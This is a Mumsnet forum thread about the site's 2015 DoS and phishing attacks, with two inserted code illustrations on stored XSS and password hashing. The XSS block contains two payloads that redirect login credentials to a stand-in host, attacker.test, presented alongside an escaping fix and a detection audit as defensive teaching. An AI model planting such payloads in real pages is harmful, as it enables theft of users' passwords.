
More about the Technical side of the attacks on Mumsnet

720 replies

JustineMumsnet · 19/08/2015 11:17

Hi all,
There have been, understandably, a lot of questions about the tech side of the attack on Mumsnet, so here, courtesy of the tech team, is some more detail. We obviously do have to be a bit careful with the details because we don't want to give away information that could help other hackers. Whilst it's true that "security through obscurity" isn't real security, we have no wish to make it easier for a future attacker.

We've spent a lot of time since the attacks began proactively defending against them, minimising their impact and protecting against future attacks. With a busy site like Mumsnet there is a lot of information to go through. When we uncover a new snippet of information, perhaps a new suspicious user account, we have to go back to the start and reanalyse, so it can be slow going at times. We are working with our technology partners, who have a lot of experience of these kinds of attacks, and we have used lots of resources available to us.

Some aspects of our technology stack have already been extensively tested by external specialists. Some of our software code is quite old - nearly as old as Mumsnet itself - and things have moved on a lot over that time. However, we have a program of code review whereby all new code is checked by someone other than the person who created it. It's not perfect and everyone makes mistakes, but we take the quality of our code very seriously.

The Denial of Service (DoS) attack against Mumsnet was a heavy, sustained attack which initially overwhelmed our ability to respond to legitimate requests. Mumsnet might typically get something like 50-100 requests per second. During the attack we were getting around 17,000 requests per second. Each request carried more data than is normal as well.

The hacking attack on our website was separate from the DOS, though we believe perpetrated by the same person or people. We follow many of the industry's best practices, such as using HTTPS for our login pages, keeping our database separate from our cluster of web servers and not accessible from the internet, and so on. We don't necessarily use the same standards of security as say your online banking service might use, for example requiring multiple passwords or using two factor authentication. We try to balance security against usability and the sensitivity of the information we hold. After all, as pointed out by one of you in an earlier thread, the majority of information we have about a user is what that user publishes in Talk, which is there for all to see.

As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either.

We are now pretty confident it was a phishing attack. Phishing, where a hacker gets a user to enter their username and password into a form from which they can capture that information, fits all the data we have. The hacker doesn't need to decrypt anything, because they capture the password in the browser as it is entered (either by typing it, or if it was automatically remembered by the user's browser or password manager). The list of passwords that has been published includes some that users have identified as being ones that they've mistyped. Our database wouldn't have mistyped ones, only accurate ones, whereas those collected by recording what a user submits would, and do, contain errors.

It's not obvious how it has been conducted, though. We have been able to create a proof of concept which shows that it could work, but that relies on some steps that would be difficult or virtually impossible for a hacker. Phishing attacks sometimes use social engineering to "trick" people into using the fake website rather than the real one, but again, for various reasons, we can rule some of these out. Other phishing attacks are more technical and use other means to get people to visit the fake page. One such example is Cross Site Scripting (XSS). XSS is ranked number three on the Open Web Application Security Project's top ten list of web site security problems. If the hacker can get the website to put his own code on pages which are to be viewed by other users, s/he can modify the page to redirect the login process to their own site: a page which looks just like our login page but is actually recording the details and sending them to the hacker. Also possible, but even less likely, is modifying our login page to submit the details to the hacker as well as to us. If the hacker had gained access to our Content Management System he could have done the former, though not the latter. However, we record all changes that are made and there are no suspicious ones.

It's impossible for us to know how many users' passwords have been collected. It's a reasonable assumption, and our working one, that the passwords of everybody that has logged in since 6th August 2015, and possibly some time before that, have been collected.

In light of the attacks, we've bolstered some aspects of our security, particularly around our administrative functions. We have further changes planned and will be working on these in the coming days.

Forcing everyone to reset their password, as we have done, would render the list useless provided that users don't choose the same new password and they've not used the same username and password elsewhere.

Some users have questioned why certain other changes aren't being made already, such as a move to enforcing stricter passwords, which makes sense. However, given how crucial the part of our system that deals with passwords is, we have to be really cautious when making changes to it. We don't want to rush and end up creating bigger holes, but we will certainly take steps to encourage users to strengthen passwords as soon as practicable.

Any questions do post here - we'll answer as transparently as we can - bearing in mind the caveat about helping future hackers mentioned earlier.

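The XSS route Justine describes above, as an added illustration that is not Mumsnet's code and says nothing about how their site is actually built: a page that interpolates poster-supplied text straight into HTML next to the login form, beside the same page with output encoding applied, and a small defender-side audit that flags script tags and any form whose action leaves the site's own origin. The site origin, the attacker domain and the three posts are all constructed for the example. Note that the second payload needs no JavaScript at all: injected markup alone is enough to put a look-alike login form in front of other users.

```python
import html
from html.parser import HTMLParser

SITE_ORIGIN = "https://forum.example"   # hypothetical site origin, not Mumsnet's


def _page(body: str) -> str:
    # Login form plus the thread body; the real form posts to the site's own origin.
    return (
        "<html><body>\n"
        f'<form id="login" action="{SITE_ORIGIN}/login" method="post">\n'
        '<input name="username"><input name="password" type="password">\n'
        "</form>\n"
        f'<div class="posts">{body}</div>\n'
        "</body></html>"
    )


def render_vulnerable(posts) -> str:
    """Stored XSS: poster-supplied text becomes part of the page's markup."""
    return _page("".join(f"<p>{p}</p>" for p in posts))


def render_hardened(posts) -> str:
    """Output encoding: the same text is HTML-escaped, so it renders as text."""
    return _page("".join(f"<p>{html.escape(p, quote=True)}</p>" for p in posts))


class _FormAudit(HTMLParser):
    """Collects script tags and form actions from rendered HTML."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.form_actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        elif tag == "form":
            self.form_actions.append(dict(attrs).get("action") or "")


def audit_page(page: str):
    """Returns (number of script tags, list of form actions that point
    anywhere other than the site's own origin). Either being non-empty on a
    page that should only carry the site's own login form is a red flag."""
    p = _FormAudit()
    p.feed(page)
    foreign = [
        a for a in p.form_actions
        if not (a.startswith("/") or a == SITE_ORIGIN or a.startswith(SITE_ORIGIN + "/"))
    ]
    return p.script_tags, foreign


# Constructed posts: one benign, two attacker payloads (attacker.test is hypothetical).
POSTS = [
    "Has anyone else had trouble logging in today?",
    # Script variant: silently repoint the real login form at the attacker.
    '<script>document.getElementById("login").action="https://attacker.test/login"</script>',
    # Markup-only variant: a look-alike form that posts to the attacker, no JS needed.
    '<form action="https://attacker.test/login" method="post">'
    'Session expired, please log in again: <input name="username">'
    '<input name="password" type="password"><button>Log in</button></form>',
]

if __name__ == "__main__":
    print("vulnerable:", audit_page(render_vulnerable(POSTS)))   # (1, ['https://attacker.test/login'])
    print("hardened:  ", audit_page(render_hardened(POSTS)))     # (0, [])
```

In a real application the escaping belongs in the templating layer (autoescaping on by default) rather than in each call site, and a Content-Security-Policy that disallows inline script and restricts `form-action` to the site's own origin limits the damage if one sink is missed. The audit here is deliberately simple: it parses markup, does not execute it, so it catches the script variant by presence and the markup variant by its off-site action.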
Fandangola · 25/08/2015 15:40

I agree about asking for all my personal details to be deleted - is this possible?

MadrigalElectromotive · 25/08/2015 15:40

Oops - wrong thread. Blush

Fiderer · 25/08/2015 16:26

I've had two emails from MN Contact Us since last night. Did have a "On the list" mail a few days ago to my old address. Changed my email address for MN.

Last night, one mail, 'Mumsnet Calling', addressed to another poster and her email address.

And another today, 'PLEASE READ...', to 'Mn (sic) Contact Us'.

madwomanbackintheattic · 25/08/2015 16:37

The e-mails addressed to another user name are from mnhq - it was a BCC error by whoever was sending them out . Apology emails have been sent to the users whose email addresses were used as the first in each group of ten (with the other 9 BCCed). Grin So (as long as my e-mail from mumsnet was genuine lol) this is not a hacker issue, just a 'gah' moment.

KateSMumsnet · 25/08/2015 16:39

@WandaFuca

On one of my attempts to access the site, I got an error message I hadn't seen before:

"Error Code 20
The proxy failed to connect to the web server, due to TCP connection timeout."

Then my IP address, Proxy IP address, Origin Server IP.

Anyone know what that was all about?

We think this was to do with us getting the site back online, but if you see it again please shout!

BlackeyedSusan · 25/08/2015 17:49

someone posted a screen shot of it on gransnet if you want a quick look at it.

Redglitter · 25/08/2015 18:03

I still can't access the app. It comes up with the BT page saying address not found.

WandaFuca · 25/08/2015 18:06

BlackeyedSusan - That is pretty much the same that I got.

DuchessofMalfi · 25/08/2015 18:08

I tried earlier to use the app but got TalkTalk page coming up instead saying it couldn't open or find MN Confused Is the app still down then?

Dawndonnaagain · 25/08/2015 18:13

I'm getting the sodding security certificate every single time I change page. Grrrrrrrr!

Pneumometer · 25/08/2015 18:24

We think this was to do with us getting the site back online,

At a rough guess, at the point at which you changed your A records to point to Incapsula's anycast addresses, you were still under attack and hadn't quite got things locked down to the point that your origin servers were only visible from Incapsula. So people were going to Incapsula, but when they in turn referred them back to the real MN, it was still slow/down. Now your servers are only visible from Incapsula and all the A records are in sync, the error has gone away.

howtorebuild · 25/08/2015 18:24

I have been forced out of GransNet.Shock I joined earlier today with the same email I use here and it won't let me in there now.

shopafrolic · 25/08/2015 18:26

This reply has been deleted

Message withdrawn at poster's request.

magimedi · 25/08/2015 19:18

I am on "The List" & have had neither of those emails from Mumsnet.

Simurgh · 25/08/2015 19:35

Mumsnet has thousands and thousands of registered members, shopafrolic, and of those, there will be some who have emails with all of the main providers. Some scammers will see an opportunity in this problem to send out thousands of 'topical' emails with phishing scams inside - and if they get, say, a 1 in 1,000 hit rate, they're ahead. (The mails don't cost them anything, after all.)

So - they may not be legit but that doesn't mean your account is in trouble.

Bakeoffcake · 25/08/2015 19:38

shop I had the first email you've posted but not the second.

ItsAllGoingToBeFine · 25/08/2015 19:39

shopafrolic from what I have read on the boards those emails are legit. I'm sure MNHq will confirm when they finally reach the bottom of the email pile.

shopafrolic · 25/08/2015 19:44

Thanks all. Will keep things as they are for now then and wait to hear. Just anxious after bank account issues (which also could have been totally unrelated of course).

TheOnlyOliviaMumsnet · 25/08/2015 20:02

Shopafrolic - you should have x 2 mails
Apols for any additional anxiety caused.
Thanks

shopafrolic · 25/08/2015 20:25

Thanks Olivia - I had the first you're on the list one immediately after the first hack. And then the two that I copied and pasted since. They just seemed odd as there was no MN branding and someone else's email address was showing.

RaspberryOverload · 25/08/2015 20:28

I got one of those "apologies" emails today, but I'm not bothered, as the email is only used for MN, with no profile details, etc.

If anyone wants to email me, feel free, but I might not reply Grin

howtorebuild · 25/08/2015 20:29

Scrap the GN thing.

OutToGetYou · 25/08/2015 21:07

Can't believe a PP thinks Justine needs to be told "your husband probably does it this way", she's the CEO of a major website FFS, of course she knows what two stage authentication is. And I'm sure she uses online banking.
Plus, it's not exactly difficult to work out from the name is it?

But of course, best the liddle laydee defers to hubby so he can mansplain it to her....

BoffinMum · 25/08/2015 22:04

Ah feck off. Once she sees the simplicity of their system she will know what I mean.

pbhj · 25/08/2015 22:13

The OP, Justine, said:

"As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either."

Can someone expand on this - salted SHA-256 passwords would probably be the standard on a site like this, is that what was in use?

Not being able to "unencrypt" doesn't mean a subset of the passwords can't be determined.

Also the problem is not really MN's data being accessed but the possibility that hashes are plain and so can be found from rainbow tables (or similar methods) and used against other sites.

The standard advice is always to change passwords on other sites where the same pass is used - this is true even if there are no known weaknesses in the hashing algo used as weaknesses in methodology (eg access to the site backend allowing phishing through the real domain) may exist.

I realise it's not the place in a main comment to highlight technical details, but could someone comment further, in particular: were passwords salted?

[Aside, why on earth is there no thread search tool???]
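An added worked example covering two points raised in this thread: Justine's statements that stored passwords are "encrypted" with a recommended algorithm and that the published list contains mistyped passwords a database copy could not contain, and pbhj's question about salting and rainbow tables. This is illustrative code only, not Mumsnet's, and it does not claim to show which algorithm Mumsnet uses (that question is still open at this point in the thread). It assumes PBKDF2-HMAC-SHA256 from the standard library as a stand-in for "a recommended algorithm with high strength settings", uses a deliberately low iteration count so the demo runs quickly, and constructs every user, password and leaked entry.

```python
import hashlib
import hmac
import os

# Demo iteration count only. Production should use the current OWASP guidance
# (hundreds of thousands of iterations for PBKDF2-HMAC-SHA256) or a memory-hard
# KDF such as scrypt or Argon2.
ITERATIONS = 50_000


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Salted, stretched hash: a fresh random salt per user plus many iterations.
    Record format (assumed for this example): algo$iterations$salt_hex$digest_hex."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown record format")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


def unsalted_sha256(password: str) -> str:
    """The weak scheme pbhj worries about: one fast, unsalted hash per password."""
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed stand-in for a rainbow table / cracked-hash list of common passwords.
COMMON_PASSWORDS = ["password", "123456", "letmein", "qwerty", "mumsnet1"]
PRECOMPUTED = {unsalted_sha256(p): p for p in COMMON_PASSWORDS}


def lookup_unsalted(hex_digest: str):
    """Instant recovery if the unsalted hash of a common password was stored."""
    return PRECOMPUTED.get(hex_digest)


def classify_leak(leaked_pairs, user_db):
    """Split a published (username, password) list into entries that verify
    against the stored hashes and entries that do not. A copy of the password
    database can only ever yield verifying entries; credentials captured as they
    are typed into a form also include typos, which is the evidence for phishing."""
    valid, invalid = [], []
    for user, pw in leaked_pairs:
        stored = user_db.get(user)
        if stored is not None and verify_password(pw, stored):
            valid.append((user, pw))
        else:
            invalid.append((user, pw))
    return valid, invalid


# Constructed users and passwords.
USER_DB = {
    "alice": hash_password("letmein"),
    "bob": hash_password("correct horse"),
    "carol": hash_password("Tr0ub4dor&3"),
}

# Constructed "published list": two accurate captures and two mistypes.
LEAKED = [
    ("alice", "letmein"),
    ("bob", "correct horse"),
    ("bob", "correct hores"),
    ("carol", "Tr0ub4dor&#"),
]

if __name__ == "__main__":
    valid, invalid = classify_leak(LEAKED, USER_DB)
    print(f"{len(valid)} entries verify, {len(invalid)} do not (consistent with capture at input)")
    print("unsalted sha256('letmein') found in table:", lookup_unsalted(unsalted_sha256("letmein")))
    print("salted record for alice found in table:", lookup_unsalted(USER_DB["alice"].split("$")[-1]))
```

Two things the code makes concrete. First, "cannot be un-encrypted" is the wrong frame: a hash is never decrypted, it is guessed against, and what decides whether a stolen table is useful is the per-user salt (which defeats precomputed tables, since the same password hashes differently for every user) and the stretching (which makes each guess expensive). An unsalted SHA-256 of a common password is a dictionary lookup; the salted, iterated record is not. Second, the argument from mistyped passwords holds exactly as stated in the original post: entries that do not verify cannot have come from the database, so their presence in the published list points to capture at the point of entry. Neither point tells you what Mumsnet actually deployed, which is why pbhj's question is worth answering, and the usual advice to change any reused password elsewhere stands regardless of the hashing scheme.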